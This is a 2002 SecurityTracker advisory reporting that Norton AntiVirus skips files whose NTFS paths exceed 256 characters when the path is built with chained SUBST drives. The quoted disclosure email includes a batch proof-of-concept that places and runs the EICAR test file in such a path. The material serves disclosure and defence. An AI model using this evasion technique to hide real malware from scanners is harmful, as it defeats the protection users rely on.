SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Report a Bug
Report a vulnerability that you have found to SecurityTracker
Questions?
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Security)  >  Norton Anti-Virus Vendors:  Symantec
Symantec's Norton Anti-Virus Fails to Scan Files With Certain Types of Long NTFS File Path Names
Date:  Jan 31 2002
Impact:  Modification of system information
Exploit Included:  Yes  
Version(s): 5.0, 7.5.1, and 8.00.58
Description:  A vulnerability was reported in Norton Anti-Virus (and potentially other virus scanning products). A local user or a virus may create a file with an NTFS file path name that cannot be scanned by the anti-virus engine.

It is reported that a file with a file path name containing more than 256 characters will not be scanned by the anti-virus scanner.

It is reported that a long folderpath can be substituted with a short file name using the "SUBST" command. A local user can change the current drive to the substituted drive to cause the path length to be reset to 3 characters (e.g., Q:\). This can apparently be repeated such that a very long file path name is created that appears to be a short file path name. It is reported that the anti-virus scanner cannot follow the deep path name.

A demonstration exploit batch script is provided in the Source Message.
Impact:  A local user (or virus code) can create a file with a particular type of file path name that will not be scanned by the anti-virus scanning engine.
Solution:  No solution was available at the time of this entry.
Vendor URL:  enterprisesecurity.symantec.com/content/productlink.cfm?PID=na&EID=0 (Links to External Site)
Cause:  Exception handling error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)
Underlying OS Comments:  Tested on Windows NT 4.0 SP4 and SP6a, Windows 2000 Professional SP2, and Windows XP Pro
Reported By:  hans.somers@nl.abnamro.com
Message History:   None.

 Source Message Contents
Date:  Wed, 30 Jan 2002 09:33:33 +0100
From:  hans.somers@nl.abnamro.com
Subject:  Long path exploit on NTFS

 

 
 
> Long path exploit on NTFS
> =====================
> The filesystem NTFS seems to be a hiding place for virusses if you use a
file path which
> exceeds 256 charaters.
 
> What is the case?
> The filepath (drive + folderpath + filename) theoraticly can take up to
32000 charaters if
> the filesystem in use is NTFS. However, the way in wich Windows NT (4.0,
2000 and
> XP) access this filesystem a maximum of 256 characters is in place. If
you try to go
> deeper, you will experience a "Path too long" error.
> In these Operating System there is a way to substitute a long folderpath,
using
> the "SUBST" command. If you change your current drive to the substituted
drive, the
> pathlength is reset to 3 (Q:\ e.g.) and Windows NT allows you to create
an even deeper
> path.
> Normally this would not alarm anyone, however, i discovered that my
favorite
> virusscanner (Norton AntiVirus) was not able to follow the deep path
where i created the
> EICAR-test string. So i created a very simple batchfile to demonstrate
this exploit.
> My virusscanner will only find this virus is the SUBST drive is availible
during the scan.
 
> I have tested this on the following platforms:
> Windows NT 4.0 SP4
> Windows NT 4.0 SP6a
> Windows 2000 Professional SP2
> Windows XP Pro
> I have determined that the following versions of Norton AntiVirus will
not follow
> the deep path during a complete scan:
> Norton AntiVirus 5.0
> Norton AntiVirus 7.5.1
> Norton Antivirus 8.00.58
 
> I suspect that other virusscanners will encounter the same "bug" so you
might try the
> sample script that i created. Additionally, other tools (quotamanagers,
inventory tools
> etc) that gather information from a NTFS partition might reveal the same
bug.
 
> After running the script below, remove the substituted drive (SUBST Q:
/D) and run a
> full scan on your C-partition. I suspect that the Eicar-virus will not be
found.
> Additionally, re-create the substituted drive and re-run the scan. Under
normal conditions
> the Eicar-virus will be found and removed (depending on your settings).
 
> As far as i can see, there is no real remedy against this exploit. I hope
this message will
> pass through the proper channels, so the responsible parties will act on
this.
 
> Responses on this posting at my address are welcome.
 
 
> Hans Somers (hans.somers@nl.abnamro.com)
 
> Sample script:
> ===========
> @echo off
> cls
> echo Start test-script NTFS-limit
> @echo Create a filepath to the limit of NTFS
> md
> c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
> \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
> 67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
> 123456789
> cd
> c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
> \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
> 67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
> 123456789
> @echo Create the Eicar test-string for PoC. This should be detected
normally if you
> have an active virusscanner.
> echo
> X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
> >EICAR.TXT
> echo. >>EICAR.TXT
> @echo Activate the Eicar test-string
> copy EICAR.TXT EICAR1.COM >NUL
> @echo Create a subst-drive Q: for this path
> subst Q:
> c:\temp\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890
> \1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\12345
> 67890\1234567890\1234567890\1234567890\1234567890\1234567890\1234567890\
> 123456789
> @echo Create e even deeper filepath (thus exceeding the limit of NTFS's
explorer)
> md Q:\1234567890\1234567890\1234567890
> @echo Change current folder into "the deep"
> Q:
> cd Q:\1234567890\1234567890\1234567890
> @echo Create the Eicar test-string
> echo
> X5O!P%%@AP[4\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
> >EICAR.TXT
> echo. >>EICAR.TXT
> @echo Activate the Eicar test-string
> copy EICAR.TXT EICAR2.COM >NUL
> EICAR2.COM
> echo .
> echo End of test-script
 
 
---------------------------------------------------------------------------
This  message  (including  any  attachments)  is  confidential  and  may be
privileged.  If you have received it by mistake please notify the sender by
return  e-mail  and  delete this message from your system. Any unauthorised
use  or  dissemination  of  this  message  in  whole or in part is strictly
prohibited.  Please  note  that e-mails are susceptible to change. ABN AMRO
Bank  N.V.  (including  its  group  companies)  shall not be liable for the
improper  or  incomplete  transmission of the information contained in this
communication  nor  for  any delay in its receipt or damage to your system.
ABN  AMRO  Bank  N.V.  (or its group companies) does not guarantee that the
integrity   of  this  communication  has  been  maintained  nor  that  this
communication is free of viruses, interceptions or interference.
---------------------------------------------------------------------------


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC